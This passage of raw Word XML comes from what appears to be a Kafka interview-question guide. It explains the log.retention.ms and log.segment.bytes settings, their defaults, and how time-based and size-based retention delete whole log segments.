            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503F27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systems, financial or transactional data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="086D35A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4A8F1">
          <v:rect id="_x0000_i3532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1359E"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 Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962CD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2E6C150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Ensures highest reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FEE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78171A9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2963889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A7BE73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2E611094" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC5C61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2A4C853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821E1D">
          <v:rect id="_x0000_i3533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A07A2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258"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="43BB3B65" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7B3A2F"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ituation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3173D4E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295B1837" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E2623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erformance &gt; Reliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07DFA21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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="221177BB" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BCC79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trade-off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3342BB2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="7DC4F429" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="132B0C8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urability &gt; Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758B583C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="281411C6" w14:textId="4182E89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534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA9B3E" w14:textId="4D2BE90E" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E20B60" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="875" w:name="_Toc197868089"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the significance of "log.retention.ms" and "log.segment.bytes" configurations in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="875"/>
    </w:p>
    <w:p w14:paraId="6742F090" w14:textId="355DF8CE" w:rsidR="006257DC" w:rsidRPr="004269A3" w:rsidRDefault="006257DC"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log.retention.ms and log.segment.bytes are two critical Kafka broker configurations that directly influence </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log managemen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ata reten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usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13A9FE"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4A708">
          <v:rect id="_x0000_i3535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D3B69"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308CDF39"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retention period (in milliseconds)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a Kafka topic's log segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C4A6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Defines how </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>long Kafka should retain messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before they are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F09D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7 days (604800000 ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62494E53"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314EC276"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86400000  # 1 day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586E975"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Messages </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>older than this threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are deleted </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regardless of whether they were consumed</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or not (unless log compaction is used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6F703"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8A131">
          <v:rect id="_x0000_i3536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EE8D5"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3BA71CC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maximum size (in bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a single </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment file</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508D43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Controls how big each log segment file can get before Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rolls over and creates a new segment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC12EF9"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1 GB (1073741824 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433D1C3"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mple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302EE5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134217728  # 128 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F85C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Affects how often </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment files are created</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and also </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how granular retention cleanup can be</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, since Kafka only deletes </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not individual messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B35D4"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3CB2FC">
          <v:rect id="_x0000_i3537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CAB07"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How They Work Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A2168"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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deletes old log segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30306D5F"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 (time-based),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0A024"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bytes (size-based), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C5B9E"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hours (alternative to ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803B4B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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire log segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395F33"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egment’s last message timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is older than log.retention.ms, AND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1105E545"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segment is not the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active segment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> being written to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A395552"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B53C0">
          <v:rect id="_x0000_i3538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="748AF42E"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Use Case Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6728D"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you want to retain logs for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 days</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and want smaller segment files to reduce deletion latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05254166"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259200000     # 3 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014AA60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67108864     # 64 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0D27C" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="00CE4B95"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539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509223A" w14:textId="7F634049" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00553D4C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="876" w:name="_Toc197868090"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="876"/>
    </w:p>
    <w:p w14:paraId="52050612" w14:textId="60B170D0" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140"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t's break down how log.retention.ms and log.segment.bytes influence </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message 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erforma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management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6C3F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D11CF">
          <v:rect id="_x0000_i3540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558DC5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Role in Message Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A720A"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24C5C173"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ines how long messages stay on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B2E1F"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set to 24 hours, Kafka will retain messages for at least one day, after which they become </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494530D4"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applies </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regardless of whether the message has been consumed or not</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, unles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is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F1F7C"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bytes (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817DC86"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ts a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum total size per topic or partition</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673B98E"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>oldest segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> once the size exceeds this threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A22AE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configure </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> time- and size-based retention, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>whichever condition is met first</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggers segment deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854506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10F854">
          <v:rect id="_x0000_i3541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D8F0D"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Role in Log Segment Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885EDC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05005932"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Determines </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when a new log segment file is created</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A7B79"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ores data in segments. This setting </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
